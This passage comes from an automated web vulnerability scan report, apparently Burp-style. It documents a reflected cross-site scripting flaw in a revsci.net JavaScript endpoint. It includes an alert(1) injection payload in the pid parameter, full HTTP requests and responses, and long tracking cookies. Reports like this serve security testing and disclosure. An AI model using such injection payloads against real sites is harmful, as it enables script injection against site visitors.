udm_0=MLv3NyEJZjpr3xSpL/sKOUxICxpURCNKVG8JBfsMOWr4c1ruOor8IW57ubLruJ70uAvWzxrBuHPGjOV0Yl999w9PWZEwp6XsRgcj+GkbCgPiYv9OYis//qNYlXaQsRkv1/9n8rbpls3/lg3b/9yLcovhjH8xhVus+bOGmVMfi7o7gawXwNvz26uIS28JGVLlC25P0hSiX8y1K25Ud7EXnL8DDb8pkUWpjvKZpMzKbPpZV94WqnSr172thZ8syzScr9cZG9oqnzD7bqSMJL5BQKcgxSuou8ECw+GXnkdl4OmbY2FbSYlCDRgc+/c6lhFH7jE0YNiubrzPt27J/JEc0Gs+XkI+Ebd1WvYw9/Xd7ftCSDR0Zwe8AhR6iKptca2vjFNTTKo+OkkLJW2FIsLYkAONGVJ9hOmW5e084U7uw0vM+Lhdzw9TqVu5ygVCjUYWXFmCqrrrRk62v1d6cSVtIHFIJ4lePrRIuyqlN2ALWcWNJ2nVPNQCtG6Dh8DEERFi+XoP1wPFhC0GiF7wn0MHND/wCWXx/JWKUU+VC34cUxuUta3r3XuTvx4d+vBQXuDPDnw29QIFptXZW6fOOuymtApEj21aZsv0egu11Apu04LD/roZjbpAC6QGunZcYL9ssZpQjWQYMBZlGqIfgh3iuuWUsPHTBGUDt5cscdNfS7TKpmHXmthcbc/d7e+/MnAdrT/1ZehbDdCHZQeWj6mIfzSpZ8cC3Zk24ZglqRgwNFbilMuOn3DcO2ugB4zdEQcmVaaz6YHh+JNmmLMjl2TA24PK3xD+fbpmhzFvEBjIi7clvv9qOiJtouwDDd2RQYT2Ep3F/HnCv/GaCR4wdJNb6Izjx2OU4EC6SMnmhzRJZx1Mvbeyktq11Zi2w55ZWgZls7Q7wzCg65f8+2GBHdPcBi0xQFO8j756qtOn/3dAStKIMF35glzGEz2NyJbHKXBtkH2X19gpB6ax9rOyGogvW99/utdnqqUGrzn/kEpQnDa2kEUk811wVSbL6q60O/bbCiUNeKz3rRkQPFP8+aD6V0zGLjDPKncsy1hNjN1jRpSMXKxDqVRdpcYwttiPkWREhaInub+YWVtT1oXubfLiNHV9UJeD2k0fkb7r3mvCCEYCbYbJQQbyzKSxCaY/3lu5/BahDewpho2bntF1PV9ZAIHz13i3/QIFqKunfGZergISuHHcpD6S5AkX5oSnOVAymhcRYncJuDVR7w3F5RLVa7EHGecTDqlEvm59ZX8cTQ5bzJ1Abtx13XYb7j1u7zVIfeXneYS+0GlZAi3yogjdpiPiBw1EH7P9o/q1Zg7W9IkgH/YVzge06UUUK4rT1AoMaf8i7WK1YW21srH7XQ0Ot8fltujTte/8QbNhYbI7IG0rOSBbSov47vv3n6MjpPrAf5qhMAXLUGatxFcl4tsfOkACgIvhTn8I6rAXvEYYlNAxsCfXmnI0p8hQiJERchlgDMgmxns4Ly+e/p6PMLWHzPtN5c+q+g+IPQG377uaac8DJzK02AriShlM9dZKDYxgqlG+zJ24k7ffFdBB4+ibuSXB8ld6ZqZ1O9+R2LgBbwAuSwdkT4ftgIBysXBOapY6pYD+cT84SMwsgTEMDgtYrO7hiyO4Q+hxJwlkbjJNzvJXX1Y8JfAsyg8ZWg53ml7FrAz2kysF0CgU8P9ILnou5Ckc6kCRS2UU0ZoeR188Jg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMJZjpn3tvXt1a8IEVqQB0CQCV8thMJqM7XhmS6ZdfXhNMD6MAQ0/jLsj29/OvYUwHJQAX9QTRhUPRts5fz5olx4eSH8VEDNkRAk8DnVGhb9WRNigcUoVX6wUo821G6oDeuyKq5jkmC/BScXIbPunaIfe+I2PrgJE4CtsXp2BYykdoq2EBzcL4bB06zDINsa0Eej+HeLZj8Bao3P+Di+z7r+eP/zCgiKFo+s+N4bMPcSFpwjgc+80i7hZa2z5yL/un0LdvfZPRdD0ZJx5krSzsDZmhGTssTAGs/8bnHfmHELct8oV1lEOsGBk5gNmnQPiwCsFTghoJo2MeTkThSLstUr4HAmcnGaUBOTv+TKgiPDNt24yl4DlNxLnFUTfCtEgkF58DDLI41LbRnHqqauLRrMhKIuIlxran1ExzPvZUEyXHzpCm5uyZGiVXdsOnW6lC3rRyd3ZSEkjOe1TJjxUhkckR3TNKgfnvbUDSzuoPlVfO8XXBI8tiIReH4N0wX9qqe0oW6uxyFvD5X4BhjFGsDytNb8Ivxa5reQ0u/yDqfy4nX3hVSDBWTi/zuYjARRaGpkQ7v9YGK8cV+nsHoICUeNTnaZXiuwE82RzP+S6K+SyNyP7BOTzH1YkbhdxjS+ekyh2VWZBpG1Zrf8isk+AmznF0TF7hkWqSb+fIzQawi7JKmPftQTH/m9iki5FEn2It3NCC53QIZBdnNH7L0Pu0QH1J1KgqUNk7vp8zHru+UwcTJK/5VfBiSH4Ogp8/onZHloDOQkbyTs4rdrRsVk52W2YyvJ6v+yLpY6OqtTUdFj6gy4o+Dk6AAYvS1z1346sifVu01lwkmJ8rCxz4MRphe5ONkj0QGHKK6HaSd2smUOBc2X5+kyEEyOzzz1R4/Cs+Gk1niFMZeYzHVn+kIQVGYyj2xaYHOLSsVA233PcYV/sxSmmMmnKq+axaNoRevk6IL1wmH/xI9dwhsNsTfH2g2Sw6XOU94ZGnc8qfZUHtfWRWfGRf3fGX0msaW0wpKIo806AeezdtzitjK3F/x7JXgxJLFydwmQSWzFTyJQSl/biOKcJKB4PumTkIOZ+qlJrcbQfV45sB1xUswN4Ncf4bxONeNh8bku9zoXHtaCJ6V4ozDynwQgnjEG6bnSmjMuXbKXq7lMkcTINYt+d+6nuOjwPjgN8maH+trkR7Us8+p2cNMJmhfXD8q09LzWTLc25+RBdBubyZieGI0NNA954yV4sSfRKYIR3Z9E4PLJBqt7QODE5v4ctuKs+vpEGCzAlnodF3fE4fixJ9xpAon61XLL5oCbPjXDa0HLPK+qB4weUtS6PBD3esiaCdhtQQVtR7eoEuaWxIMnJuN4Q/jt3YPwRiaMI90ZMNyQWKk6tX5Qo4t77GCPZELw0lPVrDqdqRMqDoBiI/1jC/le5zK1XsQUhBQfEagx9rY15zvYrV02pbUkj5zIebXSnJXw7IeigpVwkebSrIMJa8tyxexQ2yXptxELcB3qMMM7iOqqDhefVioQtHjAzRxOqWn0GqWMx1TWmPrvswaTs+e1/zy+k7RIyU56F/1K+3dQtFCiJgdIcrZkUl23gyjzasSjfuE8t8CccDayzC71iaDxbzozUk1bP+RVXrX9fO0zLOpzUAsc60T3wSMjDzfHJHIvm8Y4/eQHn9H1W7NU9snroPiLQ5JcH6rp/VrRCPm4Pjn40UYY6U6JTnAs95MhzOjKeE0MF90W7zGpCh61LHdUFMrTmzNV9snjuTiwMB6yrS+5d3BXiuW56KHOJLhxZTm3DNG0KSddAjOyzdjOanswvYOpGosp/k+MuDzD/crGr0RgdMbAN5ZgZdGI8/3h+I51oBSO6f5WXPfZOa6ggg=; Domain=.revsci.net; Expires=Wed, 27-Jun-2012 03:01:01 GMT; Path=/
Last-Modified: Tue, 28 Jun 2011 03:01:01 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 28 Jun 2011 04:01:01 GMT
X-Proc-ms: 2
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 28 Jun 2011 03:01:01 GMT
Content-Length: 6236

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
');
A10868.DM_addEncToLoc('pli', '2120305');
A10868.DM_addEncToLoc('sid', '1887835');
A10868.DM_addEncToLoc('ali', '3130307');
A10868.DM_addEncToLoc('cid', '9518378');
A10868.DM_addEncToLoc('p', '2754905e';alert(1)//b2159deb7e7');
A10868.DM_addEncToLoc('ref', 'http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517&cb=i');
function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.bo
...[SNIP]...

1.310. http://js.revsci.net/gateway/gw.js [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdf69'%3balert(1)//26368a3b0cf was submitted in the pid parameter. This input was echoed as fdf69';alert(1)//26368a3b0cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=432&vid=6127792&pid=456378fdf69'%3balert(1)//26368a3b0cf&pli=2120305&sid=1887835&ali=3130307&cid=9518378&p=275&ref=http%3A//d.tradex.openx.com/afr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Di& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_POOa="MLsXtSHtJzpvJ5G+ytKgurD8xZbguKBAUoXMlOhbDZEIyUnXvCY/f7eEYgF17PuoYfq5CEudAjRL1GbcO/7J60JGGit5YpjkTi94QZ++NpMovzSXDH2egifUZfAGA4x6DJ1ef7CxdWNM1Ath6aEIxixI6X+ZFnchP7su1AfMVdmbt4uXOwFbARuez9yGUILljsr8iZpbE0YOpDX/I8dVzRiqWCbJWrig0+Ygf+aONwJLVAG9Qci4qyJ0OEoyF/C9WVXIsdxjo58DG+M5Z24kOQTzZzl9WL1fBtLwQMgZBQn3zjpdo1exh0bsmOsoJq0J12qVAbFThsQz5IDt7CkQiyleF6OSs84OYdv+QMiLgpV9FRrdszNyJ1Z1zdWSL2eBUsGyJ9LgmSypFoj2IJYq+CYjKuJh1q5SotTKfyoRjtQMIlYaw1bYORoY2KsywkRFoyeuXaDHr+kubAEaiR4mv+ueQqOTBqIL8EaJVKNeK14CvyaGEGiOf4xVidLPtWVp2cvmx+x8USaJltoPt52X7Qo3G9b5gMMSX/O7j4QHvGs068mYD7Jt0w3zVBoiChmjJijUOZI7pBIcB7pcDyhPXu0ekU8FNf+EZ2maUs/pJNfuLWhxzdwV8IFJvoDuP/k2F1fAFaKV5m3tJu4Kbsthsmobn+AEKG1fmaDEW/Rl9s4FMKHX6d1NaUg1aGoUNW9vlSNUkNQyg5xbyIqlIG60UCqagEd7akjIlHqEKgyVPmZRXCZsks8KUgS+ggIDyN3nm8Q9ybV7DYPDsaMVL9l30qTRehQMpViyu4aazqatyngUryJYSDMAw3MoxCYvzLg4VI0yQpDT4YM7EL/sjZF3GBKEvexarBUJ8IhXSEgBy8YPlIb7J1fU36Xok+aMd7hKisl1fiJ5L9WWlvPngVsNahS23h2ilcpGbvT7P8I1H67JHJs0T5zOxlbKA0tgt1XwzumjmY1MFQG7npmmjsejndnQNq6/1ECJ9acOs9TLs4eapvNZQ+7+XrqZbKo7Bg0R+TcmXPDWqHBSsNSRS6PEPs+B0Hn8vC43OULFX/VMEqBD7Um7K4PkKLzZ45EK/e7fMS47h1FG+y0pSm42Y6HkNkhnxCrDjBcgROJzznpsuIbJZQHyXl8j4cUgGiZBxqQSPqhFr9mtghL4GOwp2YKJAlwRxM+bjbCTXIMg2izcge98/uLVSVc1qMa6m03veDkqyKsoaPFeEkA2OOgtvIAoNV11Moc2Q+7bMZeZl4CDzl94tevQyhvCzcZDWHw1CA4qMQBfMOZr4xEG93vu+i9zYjr9xG1HA/txVLLWfK/bAKKmN6fqLbcY2pW5lpqW2FJxi65P63qhCJt0YP0gMlFmQMsihPn4MV2v59cKlKSELXAgqbss7TVL5/B0TuuGU260dpfoFfufumXLCpyIlXH1DRvhprlFYuymPmKAKQrrAUgRzvmuXaEHlH5jRUx1uEFjhqo7hOpqY+eQR+el8zb4xYyA0B3Fjnz5zUZGXZEUOHOUu5GVkR50a/qnzLWhgVLpMsIBeAsDZwR2196JkcyvgVxTSCglY6cvfSw1V+yzCTCmcXLsyRIBE5QZz41zi2x/Bw=="; rsi_us_1000000="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"; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rtc_k8KG=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; rsi_segs_1000000=pUP94zmhOXMMH/C1v6FY5BD9CU6duy7ESpLgzGDKYyViGwmWW18bAQsYoAM+8HjFdJtFJWRCiLHBLDbWsPcI86yrtpktmfFacilUsrkfIWWKJiDdQnsDK82st/RBdHlSiCArToI74iBMHEIM6aRZ+ctyPyV2AcskZoa93bnD+7KzmMsYNaQWBrrYkNUezvQnLXGkhVG05Odz4K2YkQ7efGHGdJsOKQEkcQBYjtqaS6H7ZlDNGWHeUbBT+7iWjqkltSlqdFkY5ZCSD/LpMe6oE2LhWxsHk9CQb4f/4DBRvVR+Vsn3Wa2otHHl9DcyWQkxt+HNZk80xAqzN7umu7qJn1io7bu4IlqZWRAwUL/2riYdQyqUN2xVKYYypoVq1rD+CHWBoax0NCsrkHXbllfg48mnErvVtscNhDauRsHqShGST1ntuJP8Y2uTzuL21JyFn9D8BzYJI7XWgqgHY3hwgF1X4Spu79NlxqFyDqacIxYDmgj/c/80HbjalDyO2MjzVEQUdlANyAYn0j8EbYmxQKxsM6Rx3taFnmBYEmerFK8BfqeoKPoaXWO+nwv0ryXCZUva1SDjlo2wVhjQ76dAQ1KhNRC+7n6erq2kuZ1UHS7gGJ+a8IPLnbMauEqtWz/vfr9PAbndBB364psLhQxsNBZ/V+G5/rjrxQ6XCrYppz+AmSwLTlzgnXYOZE+rGQrANefuO3zqAEj7Orx7bW+c7SVq/vKvEfxbwhQK4Bb0D6+TT7bmiEPzBBOMjJtdSmdMA/UlA/1ADQ==; udm_0=MLv3NyEJZjpr3xSpL/sKOUxICxpURCNKVG8JBfsMOWr4c1ruOor8IW57ubLruJ70uAvWzxrBuHPGjOV0Yl999w9PWZEwp6XsRgcj+GkbCgPiYv9OYis//qNYlXaQsRkv1/9n8rbpls3/lg3b/9yLcovhjH8xhVus+bOGmVMfi7o7gawXwNvz26uIS28JGVLlC25P0hSiX8y1K25Ud7EXnL8DDb8pkUWpjvKZpMzKbPpZV94WqnSr172thZ8syzScr9cZG9oqnzD7bqSMJL5BQKcgxSuou8ECw+GXnkdl4OmbY2FbSYlCDRgc+/c6lhFH7jE0YNiubrzPt27J/JEc0Gs+XkI+Ebd1WvYw9/Xd7ftCSDR0Zwe8AhR6iKptca2vjFNTTKo+OkkLJW2FIsLYkAONGVJ9hOmW5e084U7uw0vM+Lhdzw9TqVu5ygVCjUYWXFmCqrrrRk62v1d6cSVtIHFIJ4lePrRIuyqlN2ALWcWNJ2nVPNQCtG6Dh8DEERFi+XoP1wPFhC0GiF7wn0MHND/wCWXx/JWKUU+VC34cUxuUta3r3XuTvx4d+vBQXuDPDnw29QIFptXZW6fOOuymtApEj21aZsv0egu11Apu04LD/roZjbpAC6QGunZcYL9ssZpQjWQYMBZlGqIfgh3iuuWUsPHTBGUDt5cscdNfS7TKpmHXmthcbc/d7e+/MnAdrT/1ZehbDdCHZQeWj6mIfzSpZ8cC3Zk24ZglqRgwNFbilMuOn3DcO2ugB4zdEQcmVaaz6YHh+JNmmLMjl2TA24PK3xD+fbpmhzFvEBjIi7clvv9qOiJtouwDDd2RQYT2Ep3F/HnCv/GaCR4wdJNb6Izjx2OU4EC6SMnmhzRJZx1Mvbeyktq11Zi2w55ZWgZls7Q7wzCg65f8+2GBHdPcBi0xQFO8j756qtOn/3dAStKIMF35glzGEz2NyJbHKXBtkH2X19gpB6ax9rOyGogvW99/utdnqqUGrzn/kEpQnDa2kEUk811wVSbL6q60O/bbCiUNeKz3rRkQPFP8+aD6V0zGLjDPKncsy1hNjN1jRpSMXKxDqVRdpcYwttiPkWREhaInub+YWVtT1oXubfLiNHV9UJeD2k0fkb7r3mvCCEYCbYbJQQbyzKSxCaY/3lu5/BahDewpho2bntF1PV9ZAIHz13i3/QIFqKunfGZergISuHHcpD6S5AkX5oSnOVAymhcRYncJuDVR7w3F5RLVa7EHGecTDqlEvm59ZX8cTQ5bzJ1Abtx13XYb7j1u7zVIfeXneYS+0GlZAi3yogjdpiPiBw1EH7P9o/q1Zg7W9IkgH/YVzge06UUUK4rT1AoMaf8i7WK1YW21srH7XQ0Ot8fltujTte/8QbNhYbI7IG0rOSBbSov47vv3n6MjpPrAf5qhMAXLUGatxFcl4tsfOkACgIvhTn8I6rAXvEYYlNAxsCfXmnI0p8hQiJERchlgDMgmxns4Ly+e/p6PMLWHzPtN5c+q+g+IPQG377uaac8DJzK02AriShlM9dZKDYxgqlG+zJ24k7ffFdBB4+ibuSXB8ld6ZqZ1O9+R2LgBbwAuSwdkT4ftgIBysXBOapY6pYD+cT84SMwsgTEMDgtYrO7hiyO4Q+hxJwlkbjJNzvJXX1Y8JfAsyg8ZWg53ml7FrAz2kysF0CgU8P9ILnou5Ckc6kCRS2UU0ZoeR188Jg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
